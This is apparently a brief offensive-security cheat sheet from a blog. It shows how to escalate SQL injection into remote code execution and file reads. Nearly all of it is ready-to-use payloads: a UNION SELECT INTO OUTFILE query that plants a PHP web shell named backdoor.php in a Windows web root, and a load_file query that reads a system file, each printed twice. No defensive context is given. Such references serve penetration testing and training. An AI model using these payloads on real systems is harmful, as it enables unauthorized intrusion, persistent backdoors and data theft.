SQL Injection – RCE and LFI Methods

Upload PHP Command Injection

Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.

union all select 1,2,3,4,"&lt;?php echo shell_exec($_GET['cmd']);?&gt;",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

1 2	union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

Load File via SQLi

Following can be used to read files from target.

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

1 2	union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

Tags: LFI, RCE, sqli

OffSec Blog